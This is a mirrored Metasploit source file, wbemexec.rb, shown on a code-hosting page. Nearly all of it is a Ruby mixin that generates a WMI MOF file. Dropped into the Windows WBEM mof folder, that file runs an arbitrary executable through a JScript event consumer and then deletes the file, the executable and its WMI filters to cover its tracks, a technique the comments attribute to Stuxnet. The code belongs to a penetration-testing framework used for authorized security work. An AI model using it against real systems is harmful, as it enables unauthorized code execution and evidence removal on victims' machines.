Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

wbemexec.rb 2.9KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
  1. # -*- coding: binary -*-
  2. #
  3. # This mixin enables executing arbitrary commands via the
  4. # Windows Management Instrumentation service.
  5. #
  6. # By writing the output of these methods to %SystemRoot%\system32\WBEM\mof,
  7. # your command line will be executed.
  8. #
  9. # This technique was used as part of Stuxnet and further reverse engineered
  10. # to this form by Ivanlef0u and jduck.
  11. #
  12. module Msf
  13. module Exploit::WbemExec
  14. def generate_mof(mofname, exe)
  15. classname = rand(0xffff).to_s
  16. # From Ivan's decompressed version
  17. mof = <<-EOT
  18. #pragma namespace("\\\\\\\\.\\\\root\\\\cimv2")
  19. class MyClass@CLASS@
  20. {
  21. [key] string Name;
  22. };
  23. class ActiveScriptEventConsumer : __EventConsumer
  24. {
  25. [key] string Name;
  26. [not_null] string ScriptingEngine;
  27. string ScriptFileName;
  28. [template] string ScriptText;
  29. uint32 KillTimeout;
  30. };
  31. instance of __Win32Provider as $P
  32. {
  33. Name = "ActiveScriptEventConsumer";
  34. CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
  35. PerUserInitialization = TRUE;
  36. };
  37. instance of __EventConsumerProviderRegistration
  38. {
  39. Provider = $P;
  40. ConsumerClassNames = {"ActiveScriptEventConsumer"};
  41. };
  42. Instance of ActiveScriptEventConsumer as $cons
  43. {
  44. Name = "ASEC";
  45. ScriptingEngine = "JScript";
  46. ScriptText = "\\ntry {var s = new ActiveXObject(\\"Wscript.Shell\\");\\ns.Run(\\"@EXE@\\");} catch (err) {};\\nsv = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");try {sv.Delete(\\"MyClass@CLASS@\\");} catch (err) {};try {sv.Delete(\\"__EventFilter.Name='instfilt'\\");} catch (err) {};try {sv.Delete(\\"ActiveScriptEventConsumer.Name='ASEC'\\");} catch(err) {};";
  47. };
  48. Instance of ActiveScriptEventConsumer as $cons2
  49. {
  50. Name = "qndASEC";
  51. ScriptingEngine = "JScript";
  52. ScriptText = "\\nvar objfs = new ActiveXObject(\\"Scripting.FileSystemObject\\");\\ntry {var f1 = objfs.GetFile(\\"wbem\\\\\\\\mof\\\\\\\\good\\\\\\\\#{mofname}\\");\\nf1.Delete(true);} catch(err) {};\\ntry {\\nvar f2 = objfs.GetFile(\\"@EXE@\\");\\nf2.Delete(true);\\nvar s = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");s.Delete(\\"__EventFilter.Name='qndfilt'\\");s.Delete(\\"ActiveScriptEventConsumer.Name='qndASEC'\\");\\n} catch(err) {};";
  53. };
  54. instance of __EventFilter as $Filt
  55. {
  56. Name = "instfilt";
  57. Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\"MyClass@CLASS@\\"";
  58. QueryLanguage = "WQL";
  59. };
  60. instance of __EventFilter as $Filt2
  61. {
  62. Name = "qndfilt";
  63. Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \\"Win32_Process\\" AND TargetInstance.Name = \\"@EXE@\\"";
  64. QueryLanguage = "WQL";
  65. };
  66. instance of __FilterToConsumerBinding as $bind
  67. {
  68. Consumer = $cons;
  69. Filter = $Filt;
  70. };
  71. instance of __FilterToConsumerBinding as $bind2
  72. {
  73. Consumer = $cons2;
  74. Filter = $Filt2;
  75. };
  76. instance of MyClass@CLASS@ as $MyClass
  77. {
  78. Name = "ClassConsumer";
  79. };
  80. EOT
  81. # Replace the input vars
  82. mof.gsub!(/@CLASS@/, classname)
  83. mof.gsub!(/@EXE@/, exe) # NOTE: \ and " should be escaped
  84. mof
  85. end
  86. end
  87. end